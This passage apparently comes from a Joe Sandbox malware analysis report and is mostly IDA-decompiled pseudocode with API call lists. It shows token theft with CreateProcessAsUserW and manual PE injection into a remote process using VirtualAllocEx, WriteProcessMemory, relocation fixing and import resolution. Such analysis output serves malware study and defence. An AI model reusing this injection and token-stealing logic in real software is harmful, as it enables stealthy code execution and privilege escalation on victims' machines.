                          				_v1508 = 0;
                          				_v1492 = 0;
                          				_v1520 = 0;
                          				_v1512 = 0;
                          				_v1496 = 0;
                          				_v1472 = 0;
                          				_t153->cb = 0x44;
                          				_v1476 =  *0x5d9a90 & 0x0000ffff;
                          				_v1480 = _t168;
                          				GetStartupInfoW(_t153);
                          				_t191 =  *0x5d9c00 - _t180; // 0x0
                          				_v1456 = 0;
                          				_v1460 = 0;
                          				_v1464 = 0;
                          				_v1468 = 0;
                          				if(_t191 != 0 || E005D18C0(_t153, _t191) != 0) {
                          					_t181 = _a20;
                          					_v1488 = 0;
                          					if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v1520) != 0) {
                          						_t179 =  &_v1240;
                          						E005D4520(_t179, 0x5f);
                          						_t189 =  &(_t189[2]);
                          						if(LookupPrivilegeValueW(0, _t179,  &(_v1428.dwXCountChars)) != 0) {
                          							_t147 =  &(_v1428.dwYSize);
                          							_t147->PrivilegeCount = 1;
                          							_t147->Privileges[0].Luid = 2;
                          							AdjustTokenPrivileges(_v1520, 0, _t147, 0x10,  &(_v1428.lpTitle),  &_v1488);
                          						}
                          					}
                          					if(_t181 == 0) {
                          						_t95 =  *0x5d9c4c; // 0x0
                          						__eflags = _t95;
                          						if(_t95 == 0) {
                          							L24:
                          							_t155 =  *0x5d9b80; // 0x0
                          							__eflags = _t155;
                          							if(_t155 == 0) {
                          								L42:
                          								_t180 = 0;
                          								_t187 = 0;
                          								_t178 = 0;
                          								__eflags = 0;
                          								L43:
                          								_t96 = _v1428.lpReserved;
                          								if(_t96 != 0) {
                          									 *0x5d9e90(_v1524, _t96);
                          								}
                          								_t97 = _v1524;
                          								if(_t97 != 0) {
                          									CloseHandle(_t97);
                          								}
                          								_t98 = _v1504;
                          								if(_t98 != 0) {
                          									 *0x5d9e88(_t98);
                          								}
                          								if(_t178 != 0) {
                          									E005C91E0(_t187);
                          								}
                          								_t99 = _v1520;
                          								if(_t99 != 0) {
                          									AdjustTokenPrivileges(_t99, 0,  &(_v1428.lpTitle), 0x10, 0, 0);
                          									CloseHandle(_v1520);
                          								}
                          								goto L53;
                          							}
                          							_t107 =  *_t155();
                          							_t182 = _t107;
                          							__eflags = _t107 - 0xffffffff;
                          							if(_t107 == 0xffffffff) {
                          								goto L42;
                          							}
                          							L26:
                          							RevertToSelf();
                          							_t110 =  *0x5d9c00(_t182,  &_v1516);
                          							L27:
                          							__eflags = _t110;
                          							if(_t110 == 0) {
                          								goto L42;
                          							}
                          							_t180 = 1;
                          							_t112 = DuplicateTokenEx(_v1524, 0x2000000, 0, 1, 1, _t189);
                          							__eflags = _t112;
                          							if(_t112 == 0) {
                          								goto L42;
                          							}
                          							CloseHandle(_v1532);
                          							_t150 =  &_v1516;
                          							 *_t150 = 0;
                          							_t114 = GetTokenInformation(_v1540, 1, 0, 0, _t150);
                          							__eflags = _t114;
                          							_t178 = 0;
                          							if(_t114 == 0) {
                          								_t115 = GetLastError();
                          								__eflags = _t115 - 0x7a;
                          								if(_t115 != 0x7a) {
                          									goto L42;
                          								}
                          								_t116 = E005C3180(_v1520, 0);
                          								_t189 =  &(_t189[2]);
                          								_t178 = _t116;
                          								__eflags = _t116;
                          								if(_t116 == 0) {
                          									L11:
                          									_t180 = 0;
                          									_t187 = 0;
                          									goto L43;
                          								}
                          								_t187 = _t178;
                          							}
                          							_t117 = GetTokenInformation(_v1544, 1, _t187, _v1520, _t150);
                          							__eflags = _t117;
                          							if(_t117 == 0) {
                          								L38:
                          								_t180 = 0;
                          								goto L43;
                          							}
                          							_t118 =  &_v1508;
                          							_t151 =  &_v552;
                          							_v1064 = 0;
                          							 *_t118 = 0x100;
                          							 *_t151 = 0;
                          							_t119 = LookupAccountSidW(0,  *_t178, _t151, _t118,  &_v1064, _t118,  &_v1444);
                          							__eflags = _t119;
                          							if(_t119 == 0) {
                          								goto L38;
                          							}
                          							_t120 = _v0;
                          							_t158 = 0;
                          							_v1448 = 0;
                          							_v1452 = 0;
                          							_v1456 = 0;
                          							_v1460 = 0;
                          							_v1464 = 0;
                          							_v1472 = 0;
                          							_v1476 = 0x20;
                          							_v1468 = _t151;
                          							__eflags = _t120;
                          							if(_t120 == 0) {
                          								L34:
                          								_t122 =  *0x5d9e84(_v1548,  &_v1476);
                          								__eflags = _t122;
                          								if(_t122 == 0) {
                          									goto L38;
                          								}
                          								_v1428.hStdOutput = 0;
                          								_t152 =  &_v1272;
                          								E005D4520(_t152, 0x9d);
                          								_t189 =  &(_t189[2]);
                          								_v1428.dwY = _t152;
                          								_t125 =  *0x5d9e8c( &_v1536, _v1556, 0);
                          								__eflags = _t125;
                          								if(_t125 == 0) {
                          									goto L38;
                          								}
                          								_t128 = CreateProcessAsUserW(_v1568, 0, _v32, 0, 0, 0, _v28, _v1548, 0,  &_v1428,  &_v1512);
                          								__eflags = _t128;
                          								if(_t128 == 0) {
                          									goto L38;
                          								}
                          								 *_v40 = _v1512;
                          								 *_v36 = _v1508;
                          								goto L43;
                          							} else {
                          								goto L33;
                          							}
                          							do {
                          								L33:
                          								_t174 =  *(_t189 + _t158 + 0x3e4) & 0x0000ffff;
                          								 *(_t120 + _t158) = _t174;
                          								_t158 = _t158 + 2;
                          								__eflags = _t174;
                          							} while (_t174 != 0);
                          							goto L34;
                          						}
                          						_t130 =  *_t95(0, 0, 1,  &_v1508,  &_v1492);
                          						__eflags = _t130;
                          						if(_t130 == 0) {
                          							goto L24;
                          						}
                          						_t131 = _v1512;
                          						_t182 = 0xffffffffffffffff;
                          						__eflags = _t131;
                          						if(_t131 == 0) {
                          							L21:
                          							_t132 =  *0x5d9be8; // 0x0
                          							__eflags = _t132;
                          							if(_t132 != 0) {
                          								 *_t132(_v1528);
                          							}
                          							__eflags = _t182 - 0xffffffff;
                          							if(_t182 != 0xffffffff) {
                          								goto L26;
                          							} else {
                          								goto L24;
                          							}
                          						}
                          						_t176 = 0;
                          						_t164 = _v1528 + 8;
                          						__eflags = _t164;
                          						while(1) {
                          							__eflags =  *_t164;
                          							if( *_t164 == 0) {
                          								break;
                          							}
                          							_t176 = _t176 + 1;
                          							_t164 = _t164 + 0xc;
                          							__eflags = _t176 - _t131;
                          							if(_t176 < _t131) {
                          								continue;
                          							}
                          							goto L21;
                          						}
                          						_t182 =  *((intOrPtr*)(_t164 - 8));
                          						goto L21;
                          					}
                          					_t134 = OpenProcess(0x1fffff, 0,  *(_t181 + 4));
                          					if(_t134 == 0) {
                          						goto L42;
                          					}
                          					_t186 = _t134;
                          					if(OpenProcessToken(_t186, 8,  &_v1512) == 0 || GetTokenInformation(_v1512, 1,  &_v1316, 0x4c,  &_v1472) == 0) {
                          						goto L42;
                          					} else {
                          						_t178 = 0;
                          						if(AllocateAndInitializeSid( &_v1484, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v1500) == 0 || EqualSid(_v1320, _v1500) == 0) {
                          							CloseHandle(_v1516);
                          							_t110 = OpenProcessToken(_t186, 2,  &_v1520);
                          							goto L27;
                          						} else {
                          							goto L11;
                          						}
                          					}
                          				} else {
                          					L53:
                          					return _t180;
                          				}
                          			}

                          APIs
                          • GetStartupInfoW.KERNEL32(?), ref: 005C54CF
                          • GetCurrentProcess.KERNEL32 ref: 005C5509
                          • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 005C5517
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005C553E
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?), ref: 005C556C
                          • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 005C5584
                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 005C559C
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 005C55BF
                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C55E4
                          • EqualSid.ADVAPI32(?,?), ref: 005C55F9
                          • CloseHandle.KERNEL32(?), ref: 005C5892
                            • Part of subcall function 005D18C0: LoadLibraryW.KERNEL32(?), ref: 005D18DC
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D18FD
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1911
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1925
                            • Part of subcall function 005D18C0: GetProcAddress.KERNEL32(00000000), ref: 005D1939
                          • CloseHandle.KERNEL32(?), ref: 005C5652
                          • OpenProcessToken.ADVAPI32(00000000,00000002,FFFFFFFF), ref: 005C5660
                          • RevertToSelf.ADVAPI32 ref: 005C569A
                          • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001), ref: 005C56C7
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 005C56D9
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 005C56F0
                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 005C570F
                          • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 005C574E
                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 005C581D
                          • GetLastError.KERNEL32 ref: 005C5847
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 005C58C9
                          • CloseHandle.KERNEL32(?), ref: 005C58D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
                          • Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
                          • Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
                          • Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: Token$Process$AddressCloseHandleOpenProc$Information$AdjustLookupPrivileges$AccountAllocateCreateCurrentDuplicateEqualErrorInfoInitializeLastLibraryLoadPrivilegeRevertSelfStartupUserValue
                          • String ID:
                          • API String ID: 896487261-3916222277
                          • Opcode ID: 7ae8917d6282dc76ba18f15cbd61882e87f3f130793ba6a2d2a007abbd6f25a9
                          • Instruction ID: 2afed350e58df66ef7dd29f9c2e941a11cc6145fa99ddbaec9dc49e673f64805
                          • Opcode Fuzzy Hash: 7ae8917d6282dc76ba18f15cbd61882e87f3f130793ba6a2d2a007abbd6f25a9
                          • Instruction Fuzzy Hash: 12C15C70209701AFE7219FA0DC48F6BBBE9FF84740F10491EF585962A0EB71E944DB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E005D0920(void* __ecx, void* __eflags) {
                          				void* _v16;
                          				long _v128;
                          				void* _v132;
                          				long _v136;
                          				intOrPtr _v140;
                          				intOrPtr _v144;
                          				intOrPtr _v148;
                          				intOrPtr _v152;
                          				long* _v156;
                          				long _v160;
                          				char _v164;
                          				signed short* _v168;
                          				long _v172;
                          				void* _v176;
                          				intOrPtr _v180;
                          				long* _v184;
                          				long _v192;
                          				void _v196;
                          				void _v200;
                          				long _v204;
                          				intOrPtr _v208;
                          				long* _v212;
                          				intOrPtr _v216;
                          				intOrPtr _v220;
                          				intOrPtr _v224;
                          				intOrPtr _v228;
                          				long _v232;
                          				intOrPtr _v236;
                          				long _v240;
                          				void* _v244;
                          				void* _v248;
                          				void* _v252;
                          				void* _v256;
                          				long _v260;
                          				long _v264;
                          				long _v268;
                          				long _v272;
                          				intOrPtr _v276;
                          				void* _v280;
                          				void* _v284;
                          				long _v288;
                          				long _v292;
                          				long _v296;
                          				intOrPtr _t299;
                          				void* _t300;
                          				void* _t302;
                          				intOrPtr _t312;
                          				long _t316;
                          				long _t317;
                          				long _t318;
                          				long* _t321;
                          				intOrPtr _t322;
                          				void* _t323;
                          				unsigned int _t326;
                          				intOrPtr _t327;
                          				long _t328;
                          				long _t337;
                          				signed int _t338;
                          				long _t342;
                          				long _t346;
                          				long _t350;
                          				long _t352;
                          				long _t354;
                          				long _t357;
                          				long _t359;
                          				long _t360;
                          				long* _t361;
                          				long _t362;
                          				signed int _t363;
                          				long _t364;
                          				intOrPtr _t367;
                          				void* _t368;
                          				long _t369;
                          				signed short* _t370;
                          				unsigned int _t372;
                          				intOrPtr* _t374;
                          				intOrPtr _t383;
                          				void* _t385;
                          				long _t390;
                          				void* _t394;
                          				long* _t395;
                          				long _t397;
                          				void* _t398;
                          				long _t401;
                          				long _t404;
                          				long _t426;
                          				long* _t430;
                          				long _t431;
                          				long** _t434;
                          				long _t437;
                          				long _t448;
                          				long _t449;
                          				void* _t464;
                          				void* _t467;
                          				SIZE_T* _t469;
                          				intOrPtr _t471;
                          				long _t473;
                          				intOrPtr _t476;
                          				intOrPtr* _t480;
                          				intOrPtr _t481;
                          				long _t483;
                          				long _t486;
                          				intOrPtr _t487;
                          				long _t488;
                          				long _t490;
                          				long _t491;
                          				void* _t493;
                          				long* _t495;
                          				long _t496;
                          				void* _t497;
                          				signed int _t499;
                          				void _t501;
                          				void _t504;
                          				long _t506;
                          				long _t507;
                          				void* _t508;
                          				signed int _t509;
                          				void* _t512;
                          				void* _t514;
                          
                          				_t508 = __ecx;
                          				_t486 = 0;
                          				E005D6610( &_v280, 0, 0x100);
                          				_t512 = (_t509 & 0xfffffff8) - 0x118 + 0xc;
                          				if( *((intOrPtr*)(_t508 + 0x80)) != 0) {
                          					L26:
                          					return _t486;
                          				}
                          				E005D7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
                          				_t514 = _t512 + 8;
                          				_t394 =  *(_t508 + 0x60);
                          				_v280 = _t394;
                          				if(( *_t394 & 0x0000ffff) != 0x5a4d) {
                          					L21:
                          					_t529 =  *((intOrPtr*)(_t508 + 0x80));
                          					if( *((intOrPtr*)(_t508 + 0x80)) == 0) {
                          						E005D5320(_t508, _t529);
                          					}
                          					L23:
                          					_t295 = _v244;
                          					if(_v244 != 0) {
                          						E005C91E0(_t295);
                          						_t514 = _t514 + 4;
                          					}
                          					E005D7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
                          					_t486 =  *((intOrPtr*)(_t508 + 0x5c));
                          					goto L26;
                          				}
                          				_t299 =  *((intOrPtr*)(_t394 + 0x3c));
                          				_t487 = _t394 + _t299;
                          				_v276 = _t487;
                          				if( *((intOrPtr*)(_t394 + _t299)) != 0x4550) {
                          					goto L21;
                          				}
                          				_t300 = VirtualAllocEx( *(_t508 + 0x70),  *(_t487 + 0x34),  *(_t487 + 0x50), 0x2000, 0x40);
                          				_v256 = _t300;
                          				if(_t300 == 0) {
                          					__eflags = GetLastError() - 0x1e7;
                          					if(__eflags != 0) {
                          						goto L21;
                          					}
                          					_t300 = VirtualAllocEx( *(_t508 + 0x70), 0,  *(_t487 + 0x50), 0x2000, 0x40);
                          					__eflags = _t300;
                          					_v256 = _t300;
                          					if(__eflags != 0) {
                          						goto L4;
                          					}
                          					goto L21;
                          				}
                          				L4:
                          				_v232 = _t300 -  *(_t487 + 0x34);
                          				_t302 = VirtualAllocEx( *(_t508 + 0x70), _t300,  *(_t487 + 0x54), 0x1000, 4);
                          				_v252 = _t302;
                          				if(_t302 == 0) {
                          					goto L21;
                          				}
                          				_v284 =  *((intOrPtr*)(_t487 + 0x80));
                          				_v288 = _t302;
                          				_v268 = E005C9E90(_t508,  *((intOrPtr*)(_t487 + 0x80)));
                          				_t469 =  &_v296;
                          				_v232 = _v288;
                          				_v228 =  *((intOrPtr*)(_t487 + 0x84));
                          				_v224 =  *((intOrPtr*)(_t487 + 0xd8));
                          				_v220 =  *((intOrPtr*)(_t487 + 0xdc));
                          				_v216 =  *((intOrPtr*)(_t487 + 0x78));
                          				_v212 =  *((intOrPtr*)(_t487 + 0x7c));
                          				 *((intOrPtr*)(_t487 + 0xd8)) = 0;
                          				 *((intOrPtr*)(_t487 + 0xdc)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x84)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x80)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x7c)) = 0;
                          				 *((intOrPtr*)(_t487 + 0x78)) = 0;
                          				_t488 =  *(_t487 + 0x54);
                          				 *_t469 = 0;
                          				if(WriteProcessMemory( *(_t508 + 0x70), _v292, _t394, _t488, _t469) == 0 || _v292 != _t488) {
                          					goto L21;
                          				} else {
                          					_t312 = _v276;
                          					 *((intOrPtr*)(_t312 + 0x80)) = _v228;
                          					 *((intOrPtr*)(_t312 + 0x84)) = _v224;
                          					 *((intOrPtr*)(_t312 + 0xd8)) = _v220;
                          					 *((intOrPtr*)(_t312 + 0xdc)) = _v216;
                          					 *((intOrPtr*)(_t312 + 0x78)) = _v212;
                          					 *((intOrPtr*)(_t312 + 0x7c)) = _v208;
                          					_v292 = 0;
                          					if(VirtualProtectEx( *(_t508 + 0x70), _v252,  *(_t312 + 0x54), 2,  &_v292) == 0) {
                          						goto L21;
                          					}
                          					_t471 = _v276;
                          					_t316 = _t471 + ( *(_t471 + 0x14) & 0x0000ffff) + 0x18;
                          					_v272 = _t316;
                          					if( *(_t471 + 6) == 0) {
                          						L27:
                          						__eflags = _v232;
                          						if(_v232 == 0) {
                          							L41:
                          							_t490 = _v264;
                          							__eflags = _t490;
                          							if(_t490 == 0) {
                          								L64:
                          								__eflags =  *(_t508 + 0x68);
                          								if( *(_t508 + 0x68) == 0) {
                          									_t395 = _v212;
                          									_t317 = E005C9E90(_t508, _t395);
                          									__eflags = _t317;
                          									_v264 = _t317;
                          									if(__eflags == 0) {
                          										goto L21;
                          									}
                          									_t491 = _t317;
                          									_t318 = E005C9E90(_t508,  *((intOrPtr*)(_t317 + 0x1c)));
                          									_v288 = _t318;
                          									_v160 = _t318;
                          									_v160 = E005C9E90(_t508,  *((intOrPtr*)(_t491 + 0x20)));
                          									_v160 = E005C9E90(_t508,  *((intOrPtr*)(_t491 + 0x24)));
                          									_v156 = _t395;
                          									_v152 = _t395 + _v220;
                          									__eflags =  *(_t491 + 0x14);
                          									if( *(_t491 + 0x14) == 0) {
                          										_t321 = _t508 + 0xa0;
                          										L103:
                          										__eflags =  *_t321;
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags =  *(_t508 + 0xa4);
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags =  *(_t508 + 0xa8);
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags =  *(_t508 + 0xac);
                          										if(__eflags != 0) {
                          											goto L65;
                          										}
                          										goto L21;
                          									}
                          									_t430 = _v284;
                          									_t398 = 0;
                          									_v288 = _t508 + 0xa0;
                          									while(1) {
                          										_v156 =  &(_t430[1]);
                          										_t337 =  *_t430;
                          										__eflags = _t337;
                          										_v136 = _t337;
                          										if(_t337 == 0) {
                          											goto L100;
                          										}
                          										__eflags = _t337 - _v144;
                          										if(_t337 < _v144) {
                          											L87:
                          											_t431 =  *(_t491 + 0x18);
                          											__eflags = _t431;
                          											if(_t431 == 0) {
                          												goto L100;
                          											}
                          											_t476 = _v148;
                          											_t338 = 0;
                          											__eflags = 0;
                          											while(1) {
                          												__eflags = _t398 - ( *(_t476 + _t338 * 2) & 0x0000ffff);
                          												if(_t398 == ( *(_t476 + _t338 * 2) & 0x0000ffff)) {
                          													break;
                          												}
                          												_t338 = _t338 + 1;
                          												__eflags = _t338 - _t431;
                          												if(_t338 < _t431) {
                          													continue;
                          												}
                          												goto L100;
                          											}
                          											_v132 = 0;
                          											_v136 = E005C9E90(_t508,  *((intOrPtr*)(_v152 + _t338 * 4)));
                          											_t495 =  &_v128;
                          											E005D7160(_t495, 0x60);
                          											_t514 = _t514 + 8;
                          											_t342 =  *((intOrPtr*)( *0x5d9d8c))(_v136, _t495);
                          											__eflags = _t342;
                          											if(_t342 == 0) {
                          												 *_v296 = _v264 + _v144;
                          											} else {
                          												E005D7160(_t495, 0x61);
                          												_t514 = _t514 + 8;
                          												_t346 =  *0x5d9d8c(_v140, _t495);
                          												__eflags = _t346;
                          												if(_t346 == 0) {
                          													 *(_t508 + 0xa4) = _v272 + _v152;
                          												} else {
                          													E005D7160(_t495, 0x62);
                          													_t514 = _t514 + 8;
                          													_t350 =  *0x5d9d8c(_v148, _t495);
                          													__eflags = _t350;
                          													if(_t350 == 0) {
                          														_t352 = _v280 + _v160;
                          														__eflags = _t352;
                          														 *(_t508 + 0xa8) = _t352;
                          													} else {
                          														E005D7160(_t495, 0x63);
                          														_t514 = _t514 + 8;
                          														_t354 =  *0x5d9d8c(_v156, _t495);
                          														__eflags = _t354;
                          														if(_t354 == 0) {
                          															 *(_t508 + 0xac) = _v168 + _v288;
                          														}
                          													}
                          												}
                          											}
                          											goto L100;
                          										}
                          										__eflags = _t337 - _v140;
                          										if(_t337 < _v140) {
                          											goto L100;
                          										}
                          										goto L87;
                          										L100:
                          										_t491 = _v260;
                          										_t398 = _t398 + 1;
                          										__eflags = _t398 -  *(_t491 + 0x14);
                          										if(_t398 <  *(_t491 + 0x14)) {
                          											_t430 = _v156;
                          											continue;
                          										}
                          										_t321 = _v288;
                          										goto L103;
                          									}
                          								}
                          								L65:
                          								_t322 = _v276;
                          								__eflags =  *((short*)(_t322 + 6));
                          								if( *((short*)(_t322 + 6)) == 0) {
                          									L77:
                          									_t323 = _v256;
                          									 *((intOrPtr*)(_t508 + 0x5c)) = _t323;
                          									_v292 = 0;
                          									_push(0);
                          									_push(1);
                          									_push(_t323);
                          									_push( &_v292);
                          									_push(3);
                          									_push( *((intOrPtr*)( *(_t508 + 0x60) +  *((intOrPtr*)( *(_t508 + 0x60) + 0x3c)) + 0x28)) + _t323);
                          									_push(_t508);
                          									E005D3FA0();
                          									_t514 = _t514 + 0x1c;
                          									__eflags = _v292;
                          									if(_v292 != 0) {
                          										L79:
                          										 *((intOrPtr*)(_t508 + 0x80)) = 1;
                          										goto L23;
                          									}
                          									__eflags =  *(_t508 + 0x68);
                          									if(__eflags == 0) {
                          										goto L21;
                          									}
                          									goto L79;
                          								}
                          								_t493 = 0;
                          								__eflags = 0;
                          								_t397 = 8;
                          								do {
                          									_t473 = _v272;
                          									_t326 =  *(_t473 + _t397 + 0x1c);
                          									asm("bt eax, 0x1d");
                          									if(__eflags < 0) {
                          										asm("bt eax, 0x1e");
                          										if(__eflags >= 0) {
                          											__eflags = _t326;
                          											_t327 = 0x10;
                          											_t426 = 0x80;
                          											L74:
                          											_t328 =  <  ? _t426 : _t327;
                          											L75:
                          											_v128 = _t328;
                          											_v288 =  *((intOrPtr*)(_t473 + _t397));
                          											_v292 = 0;
                          											_v284 =  *(_t508 + 0x70);
                          											__eflags = VirtualProtectEx(_v284, _v256 +  *((intOrPtr*)(_t473 + _t397 + 4)), _v288, _t328,  &_v292);
                          											if(__eflags == 0) {
                          												goto L21;
                          											}
                          											goto L76;
                          										}
                          										_t328 = (_t326 >> 0x0000001a & 0xffffffe0) + 0x20;
                          										goto L75;
                          									}
                          									asm("bt eax, 0x1e");
                          									if(__eflags >= 0) {
                          										__eflags = _t326;
                          										_t327 = 1;
                          										_t426 = 8;
                          										goto L74;
                          									}
                          									_t328 = (_t326 >> 0x1f) + (_t326 >> 0x1f) + 2;
                          									goto L75;
                          									L76:
                          									_t493 = _t493 + 1;
                          									_t397 = _t397 + 0x28;
                          									__eflags = _t493 - ( *(_v276 + 6) & 0x0000ffff);
                          								} while (__eflags < 0);
                          								goto L77;
                          							}
                          							_t434 =  &_v184;
                          							while(1) {
                          								__eflags =  *_t490;
                          								if( *_t490 != 0) {
                          									goto L61;
                          								}
                          								L57:
                          								__eflags =  *(_t490 + 0x10);
                          								if( *(_t490 + 0x10) != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *(_t490 + 8);
                          								if( *(_t490 + 8) != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *(_t490 + 0xc);
                          								if( *(_t490 + 0xc) != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *(_t490 + 4);
                          								if( *(_t490 + 4) == 0) {
                          									goto L64;
                          								}
                          								L61:
                          								_v164 = 0;
                          								 *((intOrPtr*)(_t434 + 0xc)) = 0;
                          								 *((intOrPtr*)(_t434 + 8)) = 0;
                          								 *((intOrPtr*)(_t434 + 4)) = 0;
                          								 *_t434 = 0;
                          								_t357 =  *(_t490 + 0xc);
                          								__eflags = _t357;
                          								if(_t357 == 0) {
                          									do {
                          										__eflags =  *_t490;
                          										if( *_t490 != 0) {
                          											goto L61;
                          										}
                          										goto L57;
                          									} while (_t357 == 0);
                          								}
                          								_t359 = E005C6740(_t508, __eflags, E005C9E90(_t508, _t357));
                          								__eflags = _t359;
                          								_v192 = _t359;
                          								if(__eflags != 0) {
                          									_t496 = _v264;
                          									_t360 =  *_t496;
                          									_v160 = _t360;
                          									__eflags = _t360;
                          									_t437 =  *(_t496 + 0x10);
                          									if(_t360 == 0) {
                          										_t360 = _t437;
                          										_v160 = _t437;
                          									}
                          									_v288 = _t437;
                          									_t361 = E005C9E90(_t508, _t360);
                          									_v184 = _t361;
                          									_v180 = _v292 + _v260;
                          									_t362 =  *_t361;
                          									__eflags = _t362;
                          									if(_t362 == 0) {
                          										L55:
                          										_t490 = _t496 + 0x14;
                          										__eflags = _t490;
                          										_t434 =  &_v184;
                          										_v264 = _t490;
                          										continue;
                          									} else {
                          										_t497 =  &_v164;
                          										while(1) {
                          											__eflags = _t362;
                          											if(__eflags < 0) {
                          												_t363 = _t362 & 0x0000ffff;
                          											} else {
                          												_t368 = E005C9E90(_t508, _t362);
                          												_v176 = _t368;
                          												_t363 = _t368 + 2;
                          											}
                          											_t364 = E005D3100(_t508, __eflags, _v184, _t363);
                          											__eflags = _t364;
                          											_v172 = _t364;
                          											if(__eflags == 0) {
                          												goto L21;
                          											}
                          											_v292 = 0;
                          											__eflags = WriteProcessMemory( *(_t508 + 0x70), _v176, _t497, 4,  &_v292);
                          											if(__eflags == 0) {
                          												goto L21;
                          											}
                          											__eflags = _v292 - 4;
                          											if(__eflags != 0) {
                          												goto L21;
                          											}
                          											_t367 = _v180;
                          											_v180 = _t367 + 4;
                          											_v176 = _v176 + 4;
                          											_t362 =  *(_t367 + 4);
                          											__eflags = _t362;
                          											if(_t362 != 0) {
                          												continue;
                          											}
                          											_t496 = _v264;
                          											goto L55;
                          										}
                          										goto L21;
                          									}
                          								}
                          								goto L21;
                          							}
                          						}
                          						_t369 = E005C9E90(_t508,  *((intOrPtr*)(_t471 + 0xa0)));
                          						__eflags = _t369;
                          						_v272 = _t369;
                          						if(_t369 == 0) {
                          							goto L41;
                          						}
                          						__eflags =  *_t369;
                          						if( *_t369 != 0) {
                          							do {
                          								_t370 = _t369 + 8;
                          								_t480 =  &_v200;
                          								_t448 =  *((intOrPtr*)(_t369 + 4)) + 0xfffffff8 >> 1;
                          								__eflags = _t448;
                          								_v204 = _t448;
                          								 *((intOrPtr*)(_t480 + 8)) = 0;
                          								 *_t480 = 0;
                          								 *((intOrPtr*)(_t480 + 0xc)) = 0;
                          								 *((intOrPtr*)(_t480 + 4)) = 0;
                          								_v168 = _t370;
                          								if(_t448 == 0) {
                          									goto L40;
                          								} else {
                          									goto L32;
                          								}
                          								do {
                          									L32:
                          									_t499 =  *_t370 & 0x0000ffff;
                          									_t372 = _t499 >> 0xc;
                          									__eflags = _t372 - 0xa;
                          									if(_t372 == 0xa) {
                          										_t501 = (_t499 & 0x00000fff) +  *_v268;
                          										_v200 = _t501;
                          										_t374 = E005C9E90(_t508, _t501);
                          										asm("adc eax, 0x0");
                          										_v196 =  *_t374 + _v236;
                          										_v192 =  *(_t374 + 4);
                          										_v296 = 0;
                          										__eflags = WriteProcessMemory( *(_t508 + 0x70), _t501 + _v260,  &_v196, 8,  &_v296);
                          										if(__eflags == 0) {
                          											goto L21;
                          										}
                          										__eflags = _v292 - 8;
                          										if(__eflags != 0) {
                          											goto L21;
                          										}
                          										goto L39;
                          									}
                          									__eflags = _t372 - 3;
                          									if(_t372 != 3) {
                          										goto L39;
                          									}
                          									_t504 = (_t499 & 0x00000fff) +  *_v268;
                          									_v200 = _t504;
                          									_v200 = _v236 +  *((intOrPtr*)(E005C9E90(_t508, _t504)));
                          									_v296 = 0;
                          									__eflags = WriteProcessMemory( *(_t508 + 0x70), _t504 + _v260,  &_v200, 4,  &_v296);
                          									if(__eflags == 0) {
                          										goto L21;
                          									}
                          									__eflags = _v292 - 4;
                          									if(__eflags == 0) {
                          										goto L39;
                          									}
                          									goto L21;
                          									L39:
                          									_t370 =  &(_v168[1]);
                          									_v168 = _t370;
                          									_t156 =  &_v204;
                          									 *_t156 = _v204 - 1;
                          									__eflags =  *_t156;
                          								} while ( *_t156 != 0);
                          								L40:
                          								_t449 = _v268;
                          								_t481 =  *((intOrPtr*)(_t449 + 4));
                          								_t369 = _t481 + _t449;
                          								_v268 = _t369;
                          								__eflags =  *(_t481 + _t449);
                          							} while ( *(_t481 + _t449) != 0);
                          						}
                          						goto L41;
                          					} else {
                          						_t401 = 0;
                          						_v284 = 1;
                          						while(1) {
                          							_t483 =  >  ?  *((intOrPtr*)(_t316 + _t401 + 8)) :  *((intOrPtr*)(_t316 + _t401 + 0x10));
                          							_v240 = _t483;
                          							_t383 =  *((intOrPtr*)(_t316 + _t401 + 0xc));
                          							_v236 = _t383;
                          							_t385 = VirtualAllocEx( *(_t508 + 0x70), _t383 + _v256, _t483, 0x1000, 4);
                          							_v248 = _t385;
                          							if(_t385 == 0) {
                          								goto L21;
                          							}
                          							_v244 = E005C3180(_v240, _v244);
